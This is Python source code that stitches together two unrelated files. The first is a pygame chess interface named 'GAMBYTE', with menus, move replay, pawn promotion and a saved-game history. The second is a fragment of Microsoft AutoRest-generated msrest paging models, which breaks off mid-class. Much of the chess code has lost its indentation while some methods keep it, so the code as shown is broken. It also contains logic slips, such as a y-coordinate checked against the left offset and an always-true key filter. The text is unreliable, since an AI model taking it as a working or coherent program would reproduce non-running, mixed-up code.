        self.pawn_upgrade_chosen = None
        self.played_row = None
        self.played_column = None
def main(self):
is_running = True
clock = pygame.time.Clock()
wait_time = 0
while is_running: # closes the window if checkmate
clock.tick(self.fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
is_running = False
if event.type == pygame.MOUSEBUTTONDOWN:
self.mouse = pygame.mouse.get_pos()
if self.is_menu:
wait_time = 0
self.show_menu()
if self.mouse != None:
for button in self.menu_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
#click on button
if button[0] == "Play vs Human" or button[0] == "Play vs AI":
self.viewing_current_move = True
self.select_color = True
if button[0] == "Play vs Human":
self.game_mode = "Human"
else:
self.game_mode = "AI"
elif button[0] == "White":
self.selected_color = "white"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Random":
random = randrange(10)
if random % 2 == 0:
self.selected_color = "white"
else:
self.selected_color = "black"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Black":
self.selected_color = "black"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Game History":
self.is_menu = False
self.is_game = False
self.is_history = True
self.list_games = self.game_history_DAO.get_all_games()
self.list_games.reverse()
self.first_game_DB = 0
self.last_game_DB = 7
self.page_chosen = False
self.tick = 0
self.viewing_game_in_db = True
elif self.is_game:
if not self.are_players_initialized:
self.board = board(self.selected_color)
self.initialize_players()
self.are_players_initialized = True
if not self.game_started:
self.game_started = True
self.start_game()
self.show_game()
##################################################### GAME LOOP ###################################################
if not self.board.game_over and not self.viewing_game_in_db:
# human player turn
if self.player_turn == self.players[0]:
if self.mouse != None and not self.board.upgrading_pawn:
square_size = self.board.position[0][0].size
if self.mouse[0] >= self.starting_pos_left and self.mouse[0] <= self.starting_pos_left + (8 * square_size):
if self.mouse[1] >= self.starting_pos_left and self.mouse[1] <= self.starting_pos_top + (8 * square_size):
#row and column selection
row = math.floor((self.mouse[1]-self.starting_pos_top)/square_size)
column = math.floor((self.mouse[0]-self.starting_pos_left)/square_size)
#piece is selected
self.player_turn.choose_move(row, column)
#piece destination is selected
if self.player_turn.starting_row != None and self.player_turn.starting_column != None and (row != self.player_turn.starting_row or column != self.player_turn.starting_column):
if self.player_turn.verify_move(row, column):
self.player_turn.valid_positions = self.player_turn.play_move(row, column)
self.player_turn.starting_row = None
self.player_turn.starting_column = None
self.played_row = row
self.played_column = column
if not self.board.upgrading_pawn:
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
#show possible moves
if self.player_turn == self.players[0]:
if self.player_turn.starting_row != None and self.player_turn.starting_column != None:
self.show_valid_positions(self.player_turn.valid_positions)
else:
# human opponent
if self.game_mode == "Human":
if self.mouse != None and not self.board.upgrading_pawn:
square_size = self.board.position[0][0].size
if self.mouse[0] >= self.starting_pos_left and self.mouse[0] <= self.starting_pos_left + (8 * square_size):
if self.mouse[1] >= self.starting_pos_left and self.mouse[1] <= self.starting_pos_top + (8 * square_size):
#row and column selection
row = math.floor((self.mouse[1]-self.starting_pos_top)/square_size)
column = math.floor((self.mouse[0]-self.starting_pos_left)/square_size)
#piece is selected
self.player_turn.choose_move(row, column)
#piece destination is selected
if self.player_turn.starting_row != None and self.player_turn.starting_column != None and (row != self.player_turn.starting_row or column != self.player_turn.starting_column):
if self.player_turn.verify_move(row, column):
self.player_turn.valid_positions = self.player_turn.play_move(row, column)
self.player_turn.starting_row = None
self.player_turn.starting_column = None
self.played_row = row
self.played_column = column
if not self.board.upgrading_pawn:
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
#show possible moves
if self.player_turn == self.players[1]:
if self.player_turn.starting_row != None and self.player_turn.starting_column != None:
self.show_valid_positions(self.player_turn.valid_positions)
# ai opponent
else:
if wait_time > 0:
self.player_turn.play_move()
self.change_player_turn()
wait_time += 1
if self.mouse != None:
for button in self.game_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
if button[0] == "<<":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 1:
self.viewing_current_move = False
self.board.viewing_index = 0
else:
self.viewing_index = 0
elif button[0] == "<":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 1:
self.viewing_current_move = False
if self.board.viewing_index > 0:
self.board.viewing_index -= 1
else:
if self.viewing_index > 0:
self.viewing_index -= 1
elif button[0] == ">":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 0 and self.board.viewing_index < len(self.board.game_information["Moves"]) - 1:
self.viewing_current_move = False
self.board.viewing_index += 1
if len(self.board.game_information["Moves"]) > 0 and self.board.viewing_index == len(self.board.game_information["Moves"]) - 1:
self.viewing_current_move = True
else:
if len(self.current_game_in_bd_viewed["Moves"]) > 0 and self.viewing_index < len(self.current_game_in_bd_viewed["Moves"]) - 1 :
self.viewing_index += 1
elif button[0] == ">>":
if not self.viewing_game_in_db:
if len(self.board.game_information["Moves"]) > 0:
self.viewing_current_move = True
self.board.viewing_index = len(self.board.game_information["Moves"]) - 1
else:
self.viewing_index = len(self.current_game_in_bd_viewed["Moves"]) - 1
elif button[0] == "Forfeit Game":
self.board.game_over = True
self.board.game_over_result = "Forfeit"
if self.board.human_player_color == "white":
self.board.winner = "Black"
else:
self.board.winner = "White"
elif button[0] == "Main Menu":
self.is_menu = True
self.is_game = False
self.select_color = False
self.are_players_initialized = False
self.game_started = False
self.viewing_index = 0
self.select_color = False
elif button[0] == "Queen":
self.pawn_upgrade_chosen = "queen"
elif button[0] == "Rook":
self.pawn_upgrade_chosen = "rook"
elif button[0] == "Bishop":
self.pawn_upgrade_chosen = "bishop"
elif button[0] == "Knight":
self.pawn_upgrade_chosen = "knight"
if self.board.upgrading_pawn and self.pawn_upgrade_chosen != None:
self.board.upgrade_pawn(self.played_row, self.played_column, self.board.upgrading_pawn_color, self.pawn_upgrade_chosen)
self.board.upgrading_pawn = False
self.pawn_upgrade_chosen = None
self.played_row = None
self.played_column = None
self.change_player_turn()
self.show_game()
if self.board.game_over and not self.viewing_game_in_db:
if not self.game_saved:
self.save_game()
self.game_saved = True
##################################################### GAME LOOP ###################################################
elif self.is_history:
self.show_history()
self.tick += 1
if self.mouse != None:
for button in self.history_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
if button[0] == "Main Menu":
self.is_menu = True
self.is_history = False
self.select_color = False
elif "View Game" in button[0]:
self.viewing_game_in_db = True
game_id = int(button[0].split()[-1])
for game in self.list_games:
if game["_id"] == game_id:
self.current_game_in_bd_viewed = game
self.is_history = False
self.is_game = True
elif button[0] == "Last page":
if self.first_game_DB > 0 and not self.page_chosen:
self.first_game_DB -= 7
self.last_game_DB -= 7
self.page_chosen = True
elif button[0] == "Next page":
if self.last_game_DB < len(self.list_games) and not self.page_chosen:
self.first_game_DB += 7
self.last_game_DB += 7
self.page_chosen = True
if self.tick >= 6:
self.page_chosen = False
self.tick = 0
self.window.blit(self.screen, (0,0))
pygame.display.update()
self.mouse = None
pygame.quit()
##################################################### FUNCTIONS ###################################################
def show_menu(self):
pygame.display.set_caption("Main Menu")
self.screen.fill(self.gray)
#titles
font = pygame.font.SysFont("Arial", 75)
title_1 = font.render("CHESS ENGINE", True, self.black)
title_1_rect = title_1.get_rect(center=(self.width//2, 60))
title_2 = font.render("GAMBYTE", True, self.black)
title_2_rect = title_2.get_rect(center=(self.width//2, 140))
self.screen.blit(title_1, title_1_rect)
self.screen.blit(title_2, title_2_rect)
#buttons
pos_play_human = self.draw_button("Play vs Human", 30, self.white, self.black, 400, 300, 70, 10, False)
pos_play_ai = self.draw_button("Play vs AI", 30, self.white, self.black, 800, 300, 100, 10, False)
pos_history = self.draw_button("Game History", 30, self.white, self.black, 100, 550, 175, 10, True)
if self.select_color:
font = pygame.font.SysFont("Arial", 30)
mode = "Game mode selected: Human VS " + self.game_mode
game_mode = font.render(mode, True, self.black)
game_mode_rect = game_mode.get_rect(center=(self.width//2, 240))
choose_color = font.render("Choose color to start game:", True, self.black)
choose_color_text = choose_color.get_rect(center=(self.width//2, 370))
self.screen.blit(game_mode, game_mode_rect)
self.screen.blit(choose_color, choose_color_text)
pos_white = self.draw_button("White", 30, self.black, self.white, 450, 430, 10, 10, False)
pos_random = self.draw_button("Random", 30, self.white, self.light_black, 100, 430, 10, 10, True)
pos_black = self.draw_button("Black", 30, self.white, self.black, 750, 430, 10, 10, False)
if self.color_buttons_init:
self.color_buttons_init = False
self.menu_button_positions.append(pos_white)
self.menu_button_positions.append(pos_random)
self.menu_button_positions.append(pos_black)
if self.game_mode_buttons_init:
self.game_mode_buttons_init = False
self.menu_button_positions.append(pos_play_human)
self.menu_button_positions.append(pos_play_ai)
self.menu_button_positions.append(pos_history)
    def show_game(self):
        """Render the full game screen: the board with pieces (either the live
        position or a replayed past move), rank/file labels, the move-list
        panel, navigation/forfeit buttons, turn and board-state banners, and
        the pawn-upgrade chooser when a promotion is pending.

        Button hit-boxes ([text, left, top, width, height]) are appended to
        self.game_button_positions for the main loop's click handling.
        """
        pygame.display.set_caption("Game")
        self.screen.fill(self.gray)
        left = self.starting_pos_left
        top = self.starting_pos_top
        color_switch = False
        color = self.orange
        square_size = None
        value = 0
        letter_value = 0
        font = pygame.font.SysFont("Arial", 30)
        #letter/number of squares depending orientation of board
        if not self.viewing_game_in_db:
            if self.selected_color == "white":
                col_text = self.white_bottom_column_values
                row_text = self.white_bottom_row_values
            else:
                col_text = self.black_bottom_column_values
                row_text = self.black_bottom_row_values
        else:
            # For a database replay, infer orientation from the color recorded
            # with the first move entry.
            moves = list(self.current_game_in_bd_viewed["Moves"].keys())
            if self.current_game_in_bd_viewed["Moves"][moves[0]][1][0] == "black":
                col_text = self.white_bottom_column_values
                row_text = self.white_bottom_row_values
            else:
                col_text = self.black_bottom_column_values
                row_text = self.black_bottom_row_values
        # Draw the 8x8 board, alternating square colors, with pieces on top.
        for row in self.board.position:
            #draw row value
            value_text = font.render(row_text[value], True, self.black)
            value_text_rect = value_text.get_rect(center=(self.starting_pos_left - 20 , top + 35))
            self.screen.blit(value_text, value_text_rect)
            value += 1
            for square in row:
                if color_switch:
                    color = self.beige
                    color_switch = False
                else:
                    color = self.orange
                    color_switch = True
                #draw squares
                square_size = square.size
                pygame.draw.rect(self.screen, color, (left, top, square_size, square_size))
                #show pieces on squares
                if self.viewing_current_move and not self.viewing_game_in_db: #if its the current move, otherwise show the positions of past moves
                    square_piece = square.get_piece()
                    if square_piece != None:
                        # Piece sprite file is "<color>_<name>.png" under self.path.
                        path = str(self.path + square_piece.color + "_" + square_piece.name + ".png")
                        piece_image = pygame.image.load(path)
                        piece_image = pygame.transform.scale(piece_image, (square_size, square_size))
                        piece_image.convert()
                        self.screen.blit(piece_image, (left, top, square_size, square_size))
                else:
                    # Replaying a past move: pick the recorded piece list either
                    # from the live board's history or the database game.
                    if not self.viewing_game_in_db:
                        piece_list = list(self.board.game_information["Moves"].values())[self.board.viewing_index]
                    else:
                        piece_list = list(self.current_game_in_bd_viewed["Moves"].values())[self.viewing_index]
                    counter = 0
                    for piece_info in piece_list:
                        counter += 1
                        # The first entry of the recorded list is skipped here;
                        # it holds move metadata (see the evaluation display
                        # below, which reads piece_list[0][0]).
                        if counter != 1:
                            if square.row == piece_info[2] and square.column == piece_info[3]:
                                path = str(self.path + piece_info[0] + "_" + piece_info[1] + ".png")
                                piece_image = pygame.image.load(path)
                                piece_image = pygame.transform.scale(piece_image, (square_size, square_size))
                                piece_image.convert()
                                self.screen.blit(piece_image, (left, top, square_size, square_size))
                #draw column letter
                if value == 7:
                    letter_text = font.render(col_text[letter_value], True, self.black)
                    letter_text_rect = letter_text.get_rect(center=(left + square_size/2, top + square_size*2 + 20))
                    self.screen.blit(letter_text, letter_text_rect)
                    letter_value += 1
                left += square_size
            top += square_size
            left = self.starting_pos_left
            # Toggle once more at end of row so adjacent rows alternate colors.
            if color_switch:
                color = self.beige
                color_switch = False
            else:
                color = self.orange
                color_switch = True
        # When replaying a database game, show the stored engine evaluation.
        if self.current_game_in_bd_viewed:
            font = pygame.font.SysFont("Arial", 40)
            piece_list = list(self.current_game_in_bd_viewed["Moves"].values())
            piece_position_at_index = piece_list[self.viewing_index]
            evaluation_text = font.render("Evaluation: " + str((piece_position_at_index[0][0])), True, self.black)
            evaluation_text_rect = evaluation_text.get_rect(center=(800, 70))
            self.screen.blit(evaluation_text, evaluation_text_rect)
        #show the list of moves done
        info_square_left = square_size*8 + self.starting_pos_left*2
        info_square_top = square_size*2 + self.starting_pos_top
        info_square_width = square_size*6
        info_square_height = square_size*4
        pygame.draw.rect(self.screen, self.black, (info_square_left, info_square_top, info_square_width, info_square_height))
        move_names = self.get_move_names()
        font = pygame.font.SysFont("Arial", 15)
        top_pos = 10
        nb_rows = 0
        # The panel fits at most 15 rows of move names.
        for row in move_names:
            nb_rows += 1
            names = font.render(row, True, self.white)
            names_rect = names.get_rect(center=(info_square_left + info_square_width/2, info_square_top + top_pos))
            self.screen.blit(names, names_rect)
            top_pos += 20
            if nb_rows == 15:
                break
        #buttons to move through the list
        first_move_button = self.draw_button("<<", 30, self.white, self.light_black, info_square_left + 80, info_square_top - square_size/2, info_square_width/15, 5, False)
        prior_move_button = self.draw_button("<", 30, self.white, self.light_black, info_square_left + (info_square_left/8)+ 80, info_square_top - square_size/2, info_square_width/15, 5, False)
        next_move_button = self.draw_button(">", 30, self.white, self.light_black, info_square_left + 2*(info_square_left/8)+ 120, info_square_top - square_size/2, info_square_width/15, 5, False)
        last_move_button = self.draw_button(">>", 30, self.white, self.light_black, info_square_left + 3*(info_square_left/8)+ 120, info_square_top - square_size/2, info_square_width/15, 5, False)
        # Forfeit is only offered for a live game, not a replay.
        if not self.viewing_game_in_db:
            forfeit_button = self.draw_button("Forfeit Game", 30, self.white, self.light_black, info_square_left + info_square_width/2, info_square_top + info_square_height + 40, info_square_width/4, 10, False)
            self.game_button_positions.append(forfeit_button)
        # "Main Menu" appears once the game is over, or always during a replay.
        if self.board.game_over and not self.viewing_game_in_db:
            return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
            self.game_button_positions.append(return_menu_button)
        elif self.viewing_game_in_db:
            return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
            self.game_button_positions.append(return_menu_button)
        # Register the navigation buttons' hit-boxes only once.
        if self.game_buttons_init:
            self.game_buttons_init = False
            self.game_button_positions.append(first_move_button)
            self.game_button_positions.append(prior_move_button)
            self.game_button_positions.append(next_move_button)
            self.game_button_positions.append(last_move_button)
        # Turn banner and check/checkmate status, only on the live position.
        if self.game_started and self.viewing_current_move and not self.viewing_game_in_db:
            font = pygame.font.SysFont("Arial", 30)
            turn_to_play = "Turn to play: "+ self.player_turn.color
            turn_to_play_text = font.render(turn_to_play, True, self.black)
            turn_to_play_text_rect = turn_to_play_text.get_rect(center=(150, 25))
            self.screen.blit(turn_to_play_text, turn_to_play_text_rect)
            self.show_checks_and_checkmates()
        # Caption showing which recorded move the displayed position follows.
        if (self.game_started and len(self.board.game_information["Moves"]) > 0) or self.viewing_game_in_db:
            font = pygame.font.SysFont("Arial", 30)
            if not self.viewing_game_in_db:
                keys_list = list(self.board.game_information["Moves"].keys())
                board_state = "Board state with last move: " + keys_list[self.board.viewing_index]
            else:
                keys_list = list(self.current_game_in_bd_viewed["Moves"].keys())
                board_state = "Board state with last move: " + keys_list[self.viewing_index]
            board_state_text = font.render(board_state, True, self.black)
            board_state_text_rect = board_state_text.get_rect(center=(info_square_left + info_square_width/2, info_square_top + info_square_height * 1.4))
            self.screen.blit(board_state_text, board_state_text_rect)
        # Pawn-promotion chooser overlay, only during a live game.
        if self.board.upgrading_pawn and not self.viewing_game_in_db:
            upgrade_left = info_square_left-30
            upgrade_top = 10
            upgrade_width = info_square_width+60
            upgrade_height = 120
            pygame.draw.rect(self.screen, self.gray, (upgrade_left, upgrade_top, upgrade_width, upgrade_height))
            upgrade_pawn_text = font.render("Upgrade pawn", True, self.black)
            upgrade_pawn_text_rect = upgrade_pawn_text.get_rect(center=(upgrade_left + upgrade_width/2, 25))
            self.screen.blit(upgrade_pawn_text, upgrade_pawn_text_rect)
            queen_button = self.draw_button("Queen", 25, self.white, self.black, upgrade_left + 65, upgrade_top + upgrade_height/2 + 15, 12, 10, False)
            self.game_button_positions.append(queen_button)
            rook_button = self.draw_button("Rook", 25, self.white, self.black, upgrade_left + upgrade_width/4 + 67, upgrade_top + upgrade_height/2 + 15, 16, 10, False)
            self.game_button_positions.append(rook_button)
            bishop_button = self.draw_button("Bishop", 25, self.white, self.black, upgrade_left + upgrade_width/4*2 + 72, upgrade_top + upgrade_height/2 + 15, 10, 10, False)
            self.game_button_positions.append(bishop_button)
            knight_button = self.draw_button("Knight", 25, self.white, self.black, upgrade_left + upgrade_width/4*3 + 65, upgrade_top + upgrade_height/2 + 15, 10, 10, False)
            self.game_button_positions.append(knight_button)
    def show_history(self):
        """Render the game-history screen: a paged table of saved games
        (7 per page) with a "View Game" button per row plus pagination and
        return-to-menu controls. Button hit-boxes are appended to
        self.history_button_positions for the main loop's click handling."""
        pygame.display.set_caption("History")
        self.screen.fill(self.gray)
        return_menu_button = self.draw_button("Main Menu", 30, self.white, self.black, 1100, 45, 20, 10, False)
        self.history_button_positions.append(return_menu_button)
        last_page_button = self.draw_button("Last page", 30, self.white, self.black, 400, 655, 20, 10, False)
        self.history_button_positions.append(last_page_button)
        next_page_button = self.draw_button("Next page", 30, self.white, self.black, 800, 655, 20, 10, False)
        self.history_button_positions.append(next_page_button)
        font = pygame.font.SysFont("Arial", 25)
        # last_game_DB is the exclusive end index of the current 7-game page.
        page = "Page " + str(int(self.last_game_DB/7)) + " of " + str(int(len(self.list_games)/7 + 1))
        page_text = font.render(page, True, self.black)
        page_text_rect = page_text.get_rect(center=(600, 655))
        self.screen.blit(page_text, page_text_rect)
        # Column headers.
        font = pygame.font.SysFont("Arial", 40)
        date_text = font.render("Date", True, self.black)
        date_text_rect = date_text.get_rect(center=(150, 45))
        self.screen.blit(date_text, date_text_rect)
        result_text = font.render("Result", True, self.black)
        result_text_rect = result_text.get_rect(center=(350, 45))
        self.screen.blit(result_text, result_text_rect)
        winner_text = font.render("Winner", True, self.black)
        winner_text_rect = winner_text.get_rect(center=(550, 45))
        self.screen.blit(winner_text, winner_text_rect)
        nb_text = font.render("Number of moves", True, self.black)
        nb_text_rect = nb_text.get_rect(center=(800, 45))
        self.screen.blit(nb_text, nb_text_rect)
        # One table row per saved game on the current page.
        font = pygame.font.SysFont("Arial", 25)
        top_pos = 150
        for i in range(self.first_game_DB, self.last_game_DB):
            # The last page may be shorter than 7 games.
            if i == len(self.list_games):
                break
            game_date_text = font.render(self.list_games[i]["Date"], True, self.black)
            game_date_text_rect = game_date_text.get_rect(center=(150, top_pos))
            self.screen.blit(game_date_text, game_date_text_rect)
            game_result_text = font.render(self.list_games[i]["Result"], True, self.black)
            game_result_text_rect = game_result_text.get_rect(center=(350, top_pos))
            self.screen.blit(game_result_text, game_result_text_rect)
            game_winner_text = font.render(self.list_games[i]["Winner"], True, self.black)
            game_winner_text_rect = game_winner_text.get_rect(center=(550, top_pos))
            self.screen.blit(game_winner_text, game_winner_text_rect)
            game_nb_text = font.render(str(len(self.list_games[i]["Moves"])), True, self.black)
            game_nb_text_rect = game_nb_text.get_rect(center=(800, top_pos))
            self.screen.blit(game_nb_text, game_nb_text_rect)
            # The game's database id is embedded in the button label and parsed
            # back out by the click handler in the main loop.
            view_game_button = self.draw_button("View Game " + str(self.list_games[i]["_id"]), 25, self.white, self.light_black, 1000, top_pos, 10, 5, False)
            self.history_button_positions.append(view_game_button)
            top_pos += 60
def draw_button(self, text, font_size, font_color, color, left, top, border_size_width, border_size_height, is_centered):
font = pygame.font.SysFont("Arial", font_size)
message = font.render(text, True, font_color)
if is_centered:
message_rect = message.get_rect(center=(self.width//2, top))
else:
message_rect = message.get_rect(center=(left, top))
button = pygame.draw.rect(self.screen, color, (message_rect[0] - border_size_width, message_rect[1] - border_size_height, message.get_width() + (border_size_width * 2), message.get_height() + (border_size_height * 2)))
self.screen.blit(message, message_rect)
return [text, message_rect[0] - border_size_width, message_rect[1] - border_size_height, message.get_width() + (border_size_width * 2), message.get_height() + (border_size_height * 2)]
def initialize_players(self):
self.players = []
if self.selected_color == "white":
self.board.bottom_color = "white"
opponent_color = "black"
else:
opponent_color = "white"
self.board.bottom_color = "black"
if self.game_mode == "Human":
self.board.bottom_color = self.selected_color
self.players.append(human(self.selected_color, self.board))
self.players.append(human(opponent_color, self.board))
else:
self.players.append(human(self.selected_color, self.board))
self.players.append(ai(opponent_color, self.board))
def start_game(self):
if self.players[0].color == "white":
self.player_turn = self.players[0]
else:
self.player_turn = self.players[1]
self.game_saved = False
def change_player_turn(self):
if self.player_turn == self.players[0]:
self.player_turn = self.players[1]
else:
self.player_turn = self.players[0]
if self.board.color_to_play == "white":
self.board.color_to_play = "black"
else:
self.board.color_to_play = "white"
def show_valid_positions(self, valid_positions):
if self.viewing_current_move:
for position in valid_positions:
pygame.draw.circle(self.screen, self.green, (self.starting_pos_left + (75 * position[1]) + 75 / 2, self.starting_pos_top + (75 * position[0]) + 75 / 2), 5)
def show_checks_and_checkmates(self):
if self.board.white_king_pos != None and self.board.black_king_pos != None:
font = pygame.font.SysFont("Arial", 30)
if self.board.is_king_in_checkmate("white") != False:
self.board.game_over = True
if self.board.is_king_in_checkmate("white") == "Checkmate":
checkmate = font.render("White King Checkmate", True, self.black)
checkmate_rect = checkmate.get_rect(center=(525, 25))
self.screen.blit(checkmate, checkmate_rect)
self.board.game_over_result = "Checkmate"
self.board.winner = "Black"
else:
stalemate = font.render("White King Stalemate", True, self.black)
stalemate_rect = stalemate.get_rect(center=(525, 25))
self.screen.blit(stalemate, stalemate_rect)
self.board.game_over_result = "Stalemate"
self.board.winner = "Draw"
elif self.board.is_king_in_checkmate("black") != False:
self.board.game_over = True
if self.board.is_king_in_checkmate("black") == "Checkmate":
checkmate = font.render("Black King Checkmate", True, self.black)
checkmate_rect = checkmate.get_rect(center=(525, 25))
self.screen.blit(checkmate, checkmate_rect)
self.board.game_over_result = "Checkmate"
self.board.winner = "White"
else:
stalemate = font.render("Black King Stalemate", True, self.black)
stalemate_rect = stalemate.get_rect(center=(525, 25))
self.screen.blit(stalemate, stalemate_rect)
self.board.game_over_result = "Stalemate"
self.board.winner = "Draw"
elif self.board.is_king_in_check(self.board.white_king_pos[0], self.board.white_king_pos[1]):
check = font.render("White King Check", True, self.black)
check_rect = check.get_rect(center=(550, 25))
self.screen.blit(check, check_rect)
elif self.board.is_king_in_check(self.board.black_king_pos[0], self.board.black_king_pos[1]):
check = font.render("Black King Check", True, self.black)
check_rect = check.get_rect(center=(550, 25))
self.screen.blit(check, check_rect)
def save_game(self):
self.board.game_information["_id"] = self.game_history_DAO.get_next_id()
self.board.game_information["Winner"] = self.board.winner
self.board.game_information["Result"] = self.board.game_over_result
self.board.game_information["Date"] = datetime.now().strftime("%d/%m/%Y, %H:%M:%S")
self.game_history_DAO.save_game(self.board.game_information)
def get_move_names(self):
if not self.viewing_game_in_db:
keys = self.board.game_information["Moves"].keys()
else:
keys = self.current_game_in_bd_viewed["Moves"].keys()
move_names = []
row = []
move_row = ""
counter = 0
#changes row after 9 moves for display
for key in keys:
if key != "Winner" or key != "Result" or key != "Date":
counter += 1
move_row += (" " + key)
if counter >= 8:
move_names.append(move_row)
counter = 0
move_row = ""
if len(move_row) > 0:
move_names.append(move_row)
return move_names
if __name__ == "__main__":
    # Use a distinct variable name: the original rebound the class name
    # `chess_game` to an instance of itself, shadowing the class.
    game = chess_game()
    game.main()
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class CustomParameterGroup(msrest.serialization.Model):
    """Groups the custom query parameters sent with a paging request.

    All required parameters must be populated in order to send to Azure.

    :param api_version: Required. Sets the api version to use.
    :type api_version: str
    :param tenant: Required. Sets the tenant to use.
    :type tenant: str
    """

    _validation = {"api_version": {"required": True}, "tenant": {"required": True}}

    _attribute_map = {
        "api_version": {"key": "api_version", "type": "str"},
        "tenant": {"key": "tenant", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Both parameters are required; a missing key raises KeyError.
        self.api_version = kwargs["api_version"]
        self.tenant = kwargs["tenant"]
class OdataProductResult(msrest.serialization.Model):
    """One page of products using the OData ``odata.nextLink`` paging shape.

    :param values:
    :type values: list[~paging.models.Product]
    :param odata_next_link:
    :type odata_next_link: str
    """

    _attribute_map = {
        "values": {"key": "values", "type": "[Product]"},
        # The wire key contains a literal dot, escaped for msrest's key parser.
        "odata_next_link": {"key": "odata\\.nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.values = kwargs.get("values")
        self.odata_next_link = kwargs.get("odata_next_link")
class OperationResult(msrest.serialization.Model):
    """Result envelope carrying the status of a request.

    :param status: The status of the request. Possible values include:
     "Succeeded", "Failed", "canceled", "Accepted", "Creating", "Created",
     "Updating", "Updated", "Deleting", "Deleted", "OK".
    :type status: str or ~paging.models.OperationResultStatus
    """

    _attribute_map = {"status": {"key": "status", "type": "str"}}

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.status = kwargs.get("status")
class PagingGetMultiplePagesLroOptions(msrest.serialization.Model):
    """Optional parameters for the get-multiple-pages LRO operation.

    :param maxresults: Sets the maximum number of items to return in the
     response.
    :type maxresults: int
    :param timeout: Sets the maximum time that the server can spend processing
     the request, in seconds. The default is 30 seconds.
    :type timeout: int
    """

    _attribute_map = {
        "maxresults": {"key": "maxresults", "type": "int"},
        "timeout": {"key": "timeout", "type": "int"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.maxresults = kwargs.get("maxresults")
        self.timeout = kwargs.get("timeout", 30)  # documented server default
class PagingGetMultiplePagesOptions(msrest.serialization.Model):
    """Optional parameters for the get-multiple-pages operation.

    :param maxresults: Sets the maximum number of items to return in the
     response.
    :type maxresults: int
    :param timeout: Sets the maximum time that the server can spend processing
     the request, in seconds. The default is 30 seconds.
    :type timeout: int
    """

    _attribute_map = {
        "maxresults": {"key": "maxresults", "type": "int"},
        "timeout": {"key": "timeout", "type": "int"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.maxresults = kwargs.get("maxresults")
        self.timeout = kwargs.get("timeout", 30)  # documented server default
class PagingGetMultiplePagesWithOffsetOptions(msrest.serialization.Model):
    """Parameters for the get-multiple-pages-with-offset operation.

    All required parameters must be populated in order to send to Azure.

    :param maxresults: Sets the maximum number of items to return in the
     response.
    :type maxresults: int
    :param offset: Required. Offset of return value.
    :type offset: int
    :param timeout: Sets the maximum time that the server can spend processing
     the request, in seconds. The default is 30 seconds.
    :type timeout: int
    """

    _validation = {"offset": {"required": True}}

    _attribute_map = {
        "maxresults": {"key": "maxresults", "type": "int"},
        "offset": {"key": "offset", "type": "int"},
        "timeout": {"key": "timeout", "type": "int"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.maxresults = kwargs.get("maxresults")
        self.offset = kwargs["offset"]  # required; KeyError if absent
        self.timeout = kwargs.get("timeout", 30)  # documented server default
class PagingGetOdataMultiplePagesOptions(msrest.serialization.Model):
    """Optional parameters for the get-OData-multiple-pages operation.

    :param maxresults: Sets the maximum number of items to return in the
     response.
    :type maxresults: int
    :param timeout: Sets the maximum time that the server can spend processing
     the request, in seconds. The default is 30 seconds.
    :type timeout: int
    """

    _attribute_map = {
        "maxresults": {"key": "maxresults", "type": "int"},
        "timeout": {"key": "timeout", "type": "int"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.maxresults = kwargs.get("maxresults")
        self.timeout = kwargs.get("timeout", 30)  # documented server default
class Product(msrest.serialization.Model):
    """A product item returned by the paging operations.

    :param properties:
    :type properties: ~paging.models.ProductProperties
    """

    _attribute_map = {"properties": {"key": "properties", "type": "ProductProperties"}}

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.properties = kwargs.get("properties")
class ProductProperties(msrest.serialization.Model):
    """Identifying properties of a Product.

    :param id:
    :type id: int
    :param name:
    :type name: str
    """

    _attribute_map = {
        "id": {"key": "id", "type": "int"},
        "name": {"key": "name", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.id = kwargs.get("id")
        self.name = kwargs.get("name")
class ProductResult(msrest.serialization.Model):
    """One page of products using the plain ``nextLink`` paging shape.

    :param values:
    :type values: list[~paging.models.Product]
    :param next_link:
    :type next_link: str
    """

    _attribute_map = {
        "values": {"key": "values", "type": "[Product]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.values = kwargs.get("values")
        self.next_link = kwargs.get("next_link")
class ProductResultValue(msrest.serialization.Model):
    """One page of products whose items arrive under the ``value`` wire key.

    :param value:
    :type value: list[~paging.models.Product]
    :param next_link:
    :type next_link: str
    """

    _attribute_map = {
